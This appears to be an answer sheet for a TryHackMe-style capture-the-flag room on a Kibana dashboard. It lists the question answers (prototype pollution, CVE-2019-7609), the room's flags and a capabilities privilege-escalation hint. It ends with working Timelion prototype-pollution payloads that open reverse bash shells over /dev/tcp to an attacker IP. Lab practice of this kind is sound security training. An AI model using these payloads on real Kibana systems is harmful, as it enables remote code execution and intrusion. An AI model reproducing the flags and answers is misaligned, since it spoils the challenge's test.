Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.
Are you able to complete the challenge? The machine may take up to 7 minutes to boot and configure
What is the vulnerability that is specific to programming languages with prototype-based inheritance?
Prototype pollution
6.5.4
CVE-2019-7609
THM{1s_easy_pwn3d_k1bana_w1th_rce}
Capabilities is a concept that provides a security system that allows "divide" root privileges into different values
No answer needed
getcap -r /
THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es}
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
or
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')